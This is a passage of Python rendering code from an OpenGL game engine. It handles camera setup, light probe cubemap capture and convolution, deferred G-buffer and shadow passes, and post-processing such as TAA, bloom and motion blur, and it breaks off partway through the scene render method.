glOrtho(0, self.viewport.width, 0, self.viewport.height, -1, 1)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
if look_at:
self.look_at()
def perspective_view(self, look_at=True):
camera = self.scene_manager.main_camera
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(camera.fov, camera.aspect, camera.near, camera.far)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
if look_at:
self.look_at()
def look_at(self):
camera = self.scene_manager.main_camera
camera_target = -camera.transform.front
camera_up = camera.transform.up
glScalef(*(1.0 / camera.transform.get_scale()))
gluLookAt(0.0, 0.0, 0.0, *camera_target, *camera_up)
glTranslatef(*(-camera.transform.get_pos()))
def set_debug_texture(self, texture):
if texture is not None and texture is not RenderTargets.BACKBUFFER and type(texture) != RenderBuffer:
self.debug_texture = texture
self.postprocess.is_render_material_instance = False
logger.info("Current texture : %s" % self.debug_texture.name)
else:
self.debug_texture = None
def bind_uniform_blocks(self):
camera = self.scene_manager.main_camera
main_light = self.scene_manager.main_light
if not camera or not main_light:
return
frame_count = self.core_manager.frame_count % 16
uniform_data = self.uniform_scene_data
uniform_data['TIME'] = self.core_manager.current_time
uniform_data['JITTER_FRAME'] = frame_count
uniform_data['RENDER_SSR'] = self.postprocess.is_render_ssr
uniform_data['RENDER_SSAO'] = self.postprocess.is_render_ssao
uniform_data['SCREEN_SIZE'] = (self.core_manager.game_backend.width, self.core_manager.game_backend.height)
uniform_data['BACKBUFFER_SIZE'] = (RenderTargets.BACKBUFFER.width, RenderTargets.BACKBUFFER.height)
uniform_data['MOUSE_POS'] = self.core_manager.get_mouse_pos()
uniform_data['DELTA_TIME'] = self.core_manager.delta
self.uniform_scene_buffer.bind_uniform_block(data=uniform_data)
uniform_data = self.uniform_view_data
uniform_data['VIEW'][...] = camera.view
uniform_data['INV_VIEW'][...] = camera.inv_view
uniform_data['VIEW_ORIGIN'][...] = camera.view_origin
uniform_data['INV_VIEW_ORIGIN'][...] = camera.inv_view_origin
uniform_data['PROJECTION'][...] = camera.projection_jitter
uniform_data['INV_PROJECTION'][...] = camera.inv_projection_jitter
uniform_data['CAMERA_POSITION'][...] = camera.transform.get_pos()
uniform_data['NEAR_FAR'][...] = (camera.near, camera.far)
uniform_data['JITTER_DELTA'][...] = self.postprocess.jitter_delta
uniform_data['JITTER_OFFSET'][...] = self.postprocess.jitter
self.uniform_view_buffer.bind_uniform_block(data=uniform_data)
uniform_data = self.uniform_light_data
uniform_data['SHADOW_MATRIX'][...] = main_light.shadow_view_projection
uniform_data['SHADOW_EXP'] = main_light.shadow_exp
uniform_data['SHADOW_BIAS'] = main_light.shadow_bias
uniform_data['SHADOW_SAMPLES'] = main_light.shadow_samples
uniform_data['LIGHT_POSITION'][...] = main_light.transform.get_pos()
uniform_data['LIGHT_DIRECTION'][...] = main_light.transform.front
uniform_data['LIGHT_COLOR'][...] = main_light.light_color[:3]
self.uniform_light_buffer.bind_uniform_block(data=uniform_data)
self.uniform_point_light_buffer.bind_uniform_block(data=self.uniform_point_light_data)
def render_light_probe(self, light_probe):
if light_probe.isRendered:
return
logger.info("Rendering Light Probe")
# Set Valid
light_probe.isRendered = True
camera = self.scene_manager.main_camera
old_pos = camera.transform.get_pos().copy()
old_rot = camera.transform.get_rotation().copy()
old_fov = camera.fov
old_aspect = camera.aspect
old_render_font = RenderOption.RENDER_FONT
old_render_skeleton = RenderOption.RENDER_SKELETON_ACTOR
old_render_effect = RenderOption.RENDER_EFFECT
old_render_collision = RenderOption.RENDER_COLLISION
old_render_ssr = self.postprocess.is_render_ssr
old_render_motion_blur = self.postprocess.is_render_motion_blur
old_antialiasing = self.postprocess.anti_aliasing
old_debug_absolute = self.postprocess.debug_absolute
old_debug_mipmap = self.postprocess.debug_mipmap
old_debug_intensity_min = self.postprocess.debug_intensity_min
old_debug_intensity_max = self.postprocess.debug_intensity_max
# set render light probe
RenderOption.RENDER_LIGHT_PROBE = True
RenderOption.RENDER_SKELETON_ACTOR = False
RenderOption.RENDER_EFFECT = False
RenderOption.RENDER_FONT = False
self.postprocess.is_render_motion_blur = False
self.postprocess.anti_aliasing = AntiAliasing.NONE_AA
camera.update_projection(fov=90.0, aspect=1.0)
def render_cube_face(dst_texture, target_face, pos, rotation):
camera.transform.set_pos(pos)
camera.transform.set_rotation(rotation)
camera.update(force_update=True)
# render
self.render_scene()
# copy
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(dst_texture, target_face=target_face)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.mirror_framebuffer(src_framebuffer)
return dst_texture
target_faces = [GL_TEXTURE_CUBE_MAP_POSITIVE_X,
GL_TEXTURE_CUBE_MAP_NEGATIVE_X,
GL_TEXTURE_CUBE_MAP_POSITIVE_Y,
GL_TEXTURE_CUBE_MAP_NEGATIVE_Y,
GL_TEXTURE_CUBE_MAP_POSITIVE_Z,
GL_TEXTURE_CUBE_MAP_NEGATIVE_Z]
pos = light_probe.transform.get_pos()
camera_rotations = [[0.0, math.pi * 1.5, 0.0],
[0.0, math.pi * 0.5, 0.0],
[math.pi * -0.5, math.pi * 1.0, 0.0],
[math.pi * 0.5, math.pi * 1.0, 0.0],
[0.0, math.pi * 1.0, 0.0],
[0.0, 0.0, 0.0]]
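        # Each rotation points the camera down the matching cube axis, so the
        # six renders fill the +X/-X, +Y/-Y and +Z/-Z faces listed above.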
# render atmosphere scene to light_probe textures.
RenderOption.RENDER_ONLY_ATMOSPHERE = True
texture_cube = RenderTargets.LIGHT_PROBE_ATMOSPHERE
for i in range(6):
render_cube_face(texture_cube, target_faces[i], pos, camera_rotations[i])
texture_cube.generate_mipmap()
# render final scene to temp textures.
RenderOption.RENDER_ONLY_ATMOSPHERE = False
texture_cube = light_probe.texture_probe
for i in range(6):
render_cube_face(texture_cube, target_faces[i], pos, camera_rotations[i])
texture_cube.generate_mipmap()
# convolution
texture_info = light_probe.texture_probe.get_texture_info()
texture_info['name'] = 'temp_cube'
temp_cube = CreateTexture(**texture_info)
mipmap_count = temp_cube.get_mipmap_count()
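        # Convolve the probe per mip level below: higher lod values store the
        # environment prefiltered for progressively rougher reflections.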
face_matrixies = [np.array([[0, 0, 1, 0], [0, 1, 0, 0], [-1, 0, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[0, 0, -1, 0], [0, 1, 0, 0], [1, 0, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 0, 1, 0], [0, -1, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 0, -1, 0], [0, 1, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]], dtype=np.float32)]
convolve_environment = self.resource_manager.get_material_instance('convolve_environment')
convolve_environment.use_program()
for i in range(6):
for lod in range(mipmap_count):
self.framebuffer_manager.bind_framebuffer(temp_cube, target_face=target_faces[i], target_level=lod)
glClear(GL_COLOR_BUFFER_BIT)
convolve_environment.bind_uniform_data("texture_environment", texture_cube)
convolve_environment.bind_uniform_data("face_matrix", face_matrixies[i])
convolve_environment.bind_uniform_data("lod", float(lod))
convolve_environment.bind_uniform_data("mipmap_count", float(mipmap_count))
self.postprocess.draw_elements()
light_probe.replace_texture_probe(temp_cube)
self.rendertarget_manager.get_temporary('temp_cube', light_probe.texture_probe)
RenderOption.RENDER_LIGHT_PROBE = False
RenderOption.RENDER_SKELETON_ACTOR = old_render_skeleton
RenderOption.RENDER_EFFECT = old_render_effect
RenderOption.RENDER_FONT = old_render_font
RenderOption.RENDER_COLLISION = old_render_collision
self.postprocess.is_render_ssr = old_render_ssr
self.postprocess.is_render_motion_blur = old_render_motion_blur
self.postprocess.anti_aliasing = old_antialiasing
self.postprocess.debug_absolute = old_debug_absolute
self.postprocess.debug_mipmap = old_debug_mipmap
self.postprocess.debug_intensity_min = old_debug_intensity_min
self.postprocess.debug_intensity_max = old_debug_intensity_max
camera.update_projection(old_fov, old_aspect)
camera.transform.set_pos(old_pos)
camera.transform.set_rotation(old_rot)
camera.update(force_update=True)
def render_gbuffer(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.DIFFUSE,
RenderTargets.MATERIAL,
RenderTargets.WORLD_NORMAL,
depth_texture=RenderTargets.DEPTH)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# render terrain
if self.scene_manager.terrain.is_render_terrain:
self.scene_manager.terrain.render_terrain(RenderMode.GBUFFER)
# render static actor
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.GBUFFER,
self.scene_manager.static_solid_render_infos)
# render velocity
self.framebuffer_manager.bind_framebuffer(RenderTargets.VELOCITY)
glClear(GL_COLOR_BUFFER_BIT)
if RenderOption.RENDER_STATIC_ACTOR:
self.postprocess.render_velocity(RenderTargets.DEPTH)
# render skeletal actor gbuffer
if RenderOption.RENDER_SKELETON_ACTOR:
self.framebuffer_manager.bind_framebuffer(RenderTargets.DIFFUSE,
RenderTargets.MATERIAL,
RenderTargets.WORLD_NORMAL,
RenderTargets.VELOCITY,
depth_texture=RenderTargets.DEPTH)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.GBUFFER,
self.scene_manager.skeleton_solid_render_infos)
def render_shadow(self):
light = self.scene_manager.main_light
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = light.shadow_view_projection
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = light.shadow_view_projection
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
# static shadow
self.framebuffer_manager.bind_framebuffer(depth_texture=RenderTargets.STATIC_SHADOWMAP)
glClear(GL_DEPTH_BUFFER_BIT)
glFrontFace(GL_CCW)
if self.scene_manager.terrain.is_render_terrain:
self.scene_manager.terrain.render_terrain(RenderMode.SHADOW)
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR, RenderMode.SHADOW, self.scene_manager.static_shadow_render_infos, self.shadowmap_material)
        # dynamic shadow
self.framebuffer_manager.bind_framebuffer(depth_texture=RenderTargets.DYNAMIC_SHADOWMAP)
glClear(GL_DEPTH_BUFFER_BIT)
glFrontFace(GL_CCW)
if RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR, RenderMode.SHADOW, self.scene_manager.skeleton_shadow_render_infos, self.shadowmap_skeletal_material)
# composite shadow maps
self.framebuffer_manager.bind_framebuffer(RenderTargets.COMPOSITE_SHADOWMAP)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glDisable(GL_CULL_FACE)
self.postprocess.render_composite_shadowmap(RenderTargets.STATIC_SHADOWMAP, RenderTargets.DYNAMIC_SHADOWMAP)
def render_preprocess(self):
# Linear depth
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
# Screen Space Reflection
if self.postprocess.is_render_ssr:
self.framebuffer_manager.bind_framebuffer(RenderTargets.SCREEN_SPACE_REFLECTION)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_screen_space_reflection(RenderTargets.HDR,
RenderTargets.WORLD_NORMAL,
RenderTargets.MATERIAL,
RenderTargets.VELOCITY,
RenderTargets.LINEAR_DEPTH)
# swap ssr resolve textures
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED, RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV = \
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV, RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED
self.framebuffer_manager.bind_framebuffer(RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_screen_space_reflection_resolve(RenderTargets.SCREEN_SPACE_REFLECTION,
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV,
RenderTargets.VELOCITY)
# SSAO
if self.postprocess.is_render_ssao:
temp_ssao = self.rendertarget_manager.get_temporary('temp_ssao', RenderTargets.SSAO)
self.framebuffer_manager.bind_framebuffer(RenderTargets.SSAO)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_ssao(texture_size=(RenderTargets.SSAO.width, RenderTargets.SSAO.height),
texture_lod=self.rendertarget_manager.texture_lod_in_ssao,
texture_normal=RenderTargets.WORLD_NORMAL,
texture_linear_depth=RenderTargets.LINEAR_DEPTH)
self.postprocess.render_gaussian_blur(RenderTargets.SSAO, temp_ssao)
def render_solid(self):
if RenderingType.DEFERRED_RENDERING == self.render_option_manager.rendering_type:
self.postprocess.render_deferred_shading(self.scene_manager.get_light_probe_texture(),
self.scene_manager.atmosphere)
elif RenderingType.FORWARD_RENDERING == self.render_option_manager.rendering_type:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.static_solid_render_infos)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.skeleton_solid_render_infos)
def render_translucent(self):
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.static_translucent_render_infos)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.skeleton_translucent_render_infos)
for render_custom_translucent_callback in self.render_custom_translucent_callbacks:
render_custom_translucent_callback()
self.render_custom_translucent_callbacks.clear()
def render_effect(self):
self.scene_manager.effect_manager.render()
def render_actors(self, render_group, render_mode, render_infos, scene_material_instance=None):
if len(render_infos) < 1:
return
last_actor = None
last_actor_material = None
last_actor_material_instance = None
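        # Cache the last bound actor/material so consecutive render infos that
        # share a program or material instance skip redundant GL binds.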
if scene_material_instance is not None:
scene_material_instance.use_program()
scene_material_instance.bind_material_instance()
# render
for render_info in render_infos:
actor = render_info.actor
geometry = render_info.geometry
actor_material = render_info.material
actor_material_instance = render_info.material_instance
is_instancing = actor.is_instancing()
if RenderMode.GBUFFER == render_mode or RenderMode.FORWARD_SHADING == render_mode:
if last_actor_material != actor_material and actor_material is not None:
actor_material.use_program()
if last_actor_material_instance != actor_material_instance and actor_material_instance is not None:
actor_material_instance.bind_material_instance()
actor_material_instance.bind_uniform_data('is_render_gbuffer', RenderMode.GBUFFER == render_mode)
if RenderMode.FORWARD_SHADING == render_mode:
actor_material_instance.bind_uniform_data('texture_probe', self.scene_manager.get_light_probe_texture())
actor_material_instance.bind_uniform_data('texture_shadow', RenderTargets.COMPOSITE_SHADOWMAP)
actor_material_instance.bind_uniform_data('texture_ssao', RenderTargets.SSAO)
actor_material_instance.bind_uniform_data('texture_scene_reflect', RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED)
# Bind Atmosphere
self.scene_manager.atmosphere.bind_precomputed_atmosphere(actor_material_instance)
elif RenderMode.SHADOW == render_mode:
if last_actor_material_instance != actor_material_instance and actor_material_instance is not None:
# get diffuse texture from actor material instance
data_diffuse = actor_material_instance.get_uniform_data('texture_diffuse')
scene_material_instance.bind_uniform_data('texture_diffuse', data_diffuse)
if last_actor != actor:
material_instance = scene_material_instance or actor_material_instance
if RenderMode.OBJECT_ID == render_mode:
material_instance.bind_uniform_data('object_id', actor.get_object_id())
elif RenderMode.GIZMO == render_mode:
material_instance.bind_uniform_data('color', actor.get_object_color())
material_instance.bind_uniform_data('is_instancing', is_instancing)
material_instance.bind_uniform_data('model', actor.transform.matrix)
if render_group == RenderGroup.SKELETON_ACTOR:
animation_buffer = actor.get_animation_buffer(geometry.skeleton.index)
prev_animation_buffer = actor.get_prev_animation_buffer(geometry.skeleton.index)
material_instance.bind_uniform_data('bone_matrices', animation_buffer, num=len(animation_buffer))
material_instance.bind_uniform_data('prev_bone_matrices', prev_animation_buffer, num=len(prev_animation_buffer))
# draw
if is_instancing:
geometry.draw_elements_instanced(actor.get_instance_render_count(), self.actor_instance_buffer, [actor.instance_matrix, ])
else:
geometry.draw_elements()
last_actor = actor
last_actor_material = actor_material
last_actor_material_instance = actor_material_instance
def render_selected_object(self):
selected_object = self.scene_manager.get_selected_object()
if selected_object is not None:
self.framebuffer_manager.bind_framebuffer(RenderTargets.TEMP_RGBA8)
glDisable(GL_DEPTH_TEST)
glDepthMask(False)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.set_blend_state(False)
object_type = type(selected_object)
if SkeletonActor == object_type and RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.SELECTED_OBJECT,
self.scene_manager.selected_object_render_info,
self.selcted_skeletal_object_material)
elif StaticActor == object_type and RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.SELECTED_OBJECT,
self.scene_manager.selected_object_render_info,
self.selcted_static_object_material)
elif Spline3D == object_type:
self.debug_line_manager.bind_render_spline_program()
self.debug_line_manager.render_spline(selected_object, Float4(1.0, 1.0, 1.0, 1.0))
else:
return
# composite
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
self.selcted_object_composite_material.use_program()
self.selcted_object_composite_material.bind_uniform_data("texture_mask", RenderTargets.TEMP_RGBA8)
self.postprocess.draw_elements()
def render_axis_gizmo(self, render_mode):
if self.scene_manager.get_selected_object() is not None:
axis_gizmo_actor = self.scene_manager.get_axis_gizmo()
material_instance = None
if RenderMode.GIZMO == render_mode:
material_instance = self.render_color_material
elif RenderMode.OBJECT_ID == render_mode:
material_instance = self.static_object_id_material
material_instance.use_program()
material_instance.bind_uniform_data('is_instancing', False)
material_instance.bind_uniform_data('model', axis_gizmo_actor.transform.matrix)
geometries = axis_gizmo_actor.get_geometries()
for i, geometry in enumerate(geometries):
if RenderMode.GIZMO == render_mode:
material_instance.bind_uniform_data('color', axis_gizmo_actor.get_object_color(i))
elif RenderMode.OBJECT_ID == render_mode:
material_instance.bind_uniform_data('object_id', axis_gizmo_actor.get_object_id(i))
geometry.draw_elements()
def render_object_id(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.OBJECT_ID, depth_texture=RenderTargets.OBJECT_ID_DEPTH)
glDisable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
self.set_blend_state(False)
# render static actor object id
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.static_solid_render_infos,
self.static_object_id_material)
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.static_translucent_render_infos,
self.static_object_id_material)
# render skeletal actor object id
if RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.skeleton_solid_render_infos,
self.skeletal_object_id_material)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.skeleton_translucent_render_infos,
self.skeletal_object_id_material)
# spline object id
self.debug_line_manager.bind_render_spline_program()
for spline in self.scene_manager.splines:
object_id = spline.get_object_id()
self.debug_line_manager.render_spline(spline, Float4(object_id, object_id, object_id, 1.0), add_width=10.0)
# spline gizmo object id
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.spline_gizmo_render_infos,
self.static_object_id_material)
# gizmo object id
glClear(GL_DEPTH_BUFFER_BIT)
self.render_axis_gizmo(RenderMode.OBJECT_ID)
def render_heightmap(self, actor):
self.framebuffer_manager.bind_framebuffer(RenderTargets.TEMP_HEIGHT_MAP)
self.set_blend_state(blend_enable=True, equation=GL_MAX, func_src=GL_ONE, func_dst=GL_ONE)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glDisable(GL_CULL_FACE)
glDisable(GL_DEPTH_TEST)
        glClearColor(0.0, 0.0, 0.0, 1.0)
        glClear(GL_COLOR_BUFFER_BIT)
self.render_heightmap_material.use_program()
self.render_heightmap_material.bind_material_instance()
self.render_heightmap_material.bind_uniform_data('model', actor.transform.matrix)
self.render_heightmap_material.bind_uniform_data('bound_box_min', actor.bound_box.bound_min)
self.render_heightmap_material.bind_uniform_data('bound_box_max', actor.bound_box.bound_max)
actor.get_geometry(0).draw_elements()
if RenderTargets.TEMP_HEIGHT_MAP.enable_mipmap:
self.postprocess.render_generate_max_z(RenderTargets.TEMP_HEIGHT_MAP)
def render_bones(self):
glDisable(GL_DEPTH_TEST)
glDisable(GL_CULL_FACE)
mesh = self.resource_manager.get_mesh("Cube")
static_actors = self.scene_manager.static_actors[:]
if mesh and self.debug_bone_material:
material_instance = self.debug_bone_material
material_instance.use_program()
material_instance.bind()
def draw_bone(mesh, skeleton_mesh, parent_matrix, material_instance, bone, root_matrix, isAnimation):
if isAnimation:
bone_transform = skeleton_mesh.get_animation_transform(bone.name, frame)
else:
bone_transform = np.linalg.inv(bone.inv_bind_matrix)
if bone.children:
for child_bone in bone.children:
if isAnimation:
bone_transform = skeleton_mesh.get_animation_transform(bone.name, frame)
child_transform = skeleton_mesh.get_animation_transform(child_bone.name, frame)
else:
bone_transform = np.linalg.inv(bone.inv_bind_matrix)
child_transform = np.linalg.inv(child_bone.inv_bind_matrix)
material_instance.bind_uniform_data("mat1", np.dot(bone_transform, root_matrix))
material_instance.bind_uniform_data("mat2", np.dot(child_transform, root_matrix))
mesh.draw_elements()
draw_bone(mesh, skeleton_mesh, bone_transform.copy(), material_instance, child_bone, root_matrix, isAnimation)
else:
material_instance.bind_uniform_data("mat1", np.dot(bone_transform, root_matrix))
child_transform = np.dot(bone_transform, root_matrix)
child_transform[3, :] += child_transform[1, :]
material_instance.bind_uniform_data("mat2", child_transform)
mesh.draw_elements()
for static_actor in static_actors:
if static_actor.model and static_actor.model.mesh and static_actor.model.mesh.skeletons:
skeletons = static_actor.model.mesh.skeletons
skeleton_mesh = static_actor.model.mesh
frame_count = skeleton_mesh.get_animation_frame_count()
frame = math.fmod(self.core_manager.current_time * 30.0, frame_count) if frame_count > 0.0 else 0.0
isAnimation = frame_count > 0.0
for skeleton in skeletons:
matrix = static_actor.transform.matrix
for bone in skeleton.hierachy:
draw_bone(mesh, skeleton_mesh, Matrix4().copy(), material_instance, bone, matrix, isAnimation)
def render_postprocess(self):
# bind frame buffer
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
# copy HDR target
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR_TEMP)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Temporal AA
if AntiAliasing.TAA == self.postprocess.anti_aliasing:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_temporal_antialiasing(RenderTargets.HDR_TEMP,
RenderTargets.TAA_RESOLVE,
RenderTargets.VELOCITY)
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(RenderTargets.TAA_RESOLVE)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Bloom
if self.postprocess.is_render_bloom:
self.postprocess.render_bloom(RenderTargets.HDR)
# Light Shaft
if self.postprocess.is_render_light_shaft:
self.framebuffer_manager.bind_framebuffer(RenderTargets.LIGHT_SHAFT)
self.postprocess.render_light_shaft(RenderTargets.ATMOSPHERE, RenderTargets.DEPTH)
# Depth Of Field
if self.postprocess.is_render_depth_of_field:
self.postprocess.render_depth_of_field()
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
RenderTargets.HDR.generate_mipmap()
# Tone Map
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_tone_map(RenderTargets.HDR,
RenderTargets.BLOOM_0,
RenderTargets.BLOOM_1,
RenderTargets.BLOOM_2,
RenderTargets.BLOOM_3,
RenderTargets.BLOOM_4,
RenderTargets.LIGHT_SHAFT)
# MSAA Test
if AntiAliasing.MSAA == self.postprocess.anti_aliasing:
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
# resolve MSAA
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Motion Blur
if self.postprocess.is_render_motion_blur:
backbuffer_copy = self.rendertarget_manager.get_temporary('backbuffer_copy', RenderTargets.BACKBUFFER)
self.framebuffer_manager.bind_framebuffer(backbuffer_copy)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_motion_blur(RenderTargets.VELOCITY, RenderTargets.BACKBUFFER)
# copy to backbuffer
src_framebuffer = self.framebuffer_manager.get_framebuffer(backbuffer_copy)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
def render_log(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
self.font_manager.render_log(self.viewport.width, self.viewport.height)
def render_text(self, text_render_data, offset_x, offset_y, canvas_width, canvas_height):
if 0 < text_render_data.render_count:
self.font_shader.use_program()
self.font_shader.bind_material_instance()
self.font_shader.bind_uniform_data("texture_font", text_render_data.font_data.texture)
self.font_shader.bind_uniform_data("font_size", text_render_data.font_size)
self.font_shader.bind_uniform_data("offset", (offset_x, offset_y))
self.font_shader.bind_uniform_data("inv_canvas_size", (1.0 / canvas_width, 1.0 / canvas_height))
self.font_shader.bind_uniform_data("count_of_side", text_render_data.font_data.count_of_side)
self.postprocess.draw_elements_instanced(text_render_data.render_count, self.font_instance_buffer, [text_render_data.render_queue, ])
def render_axis(self):
camera = self.scene_manager.main_camera
line_thickness = 2.0
line_length = 100.0
line_size = Float2(line_length / self.core_manager.game_backend.width, line_length / self.core_manager.game_backend.height)
line_offset = line_size - 1.0
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[2][0:2] * line_size, color=Float4(0.0, 0.0, 1.0, 1.0), width=line_thickness)
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[1][0:2] * line_size, color=Float4(0.0, 1.0, 0.0, 1.0), width=line_thickness)
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[0][0:2] * line_size, color=Float4(1.0, 0.0, 0.0, 1.0), width=line_thickness)
def render_scene(self):
main_camera = self.scene_manager.main_camera
# bind scene constants uniform blocks
self.bind_uniform_blocks()
self.set_blend_state(False)
glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST)
glPolygonMode(GL_FRONT_AND_BACK, self.view_mode)
# glEnable(GL_FRAMEBUFFER_SRGB)
glEnable(GL_MULTISAMPLE)
glEnable(GL_TEXTURE_CUBE_MAP_SEAMLESS)
glDepthFunc(GL_LEQUAL)
glEnable(GL_CULL_FACE)
glFrontFace(GL_CCW)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
if self.postprocess.is_render_shader() and not RenderOption.RENDER_LIGHT_PROBE:
""" debug shader """
self.set_blend_state(False)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_material_instance()
elif RenderOption.RENDER_ONLY_ATMOSPHERE and RenderOption.RENDER_LIGHT_PROBE:
""" render light probe preprocess """
self.framebuffer_manager.bind_framebuffer(RenderTargets.COMPOSITE_SHADOWMAP)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.WORLD_NORMAL, depth_texture=RenderTargets.DEPTH)
glClearColor(0.0, 1.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
# render atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.scene_manager.atmosphere.render_precomputed_atmosphere(RenderTargets.LINEAR_DEPTH,
RenderTargets.COMPOSITE_SHADOWMAP,
RenderOption.RENDER_LIGHT_PROBE)
# done render light probe preprocess
return
else:
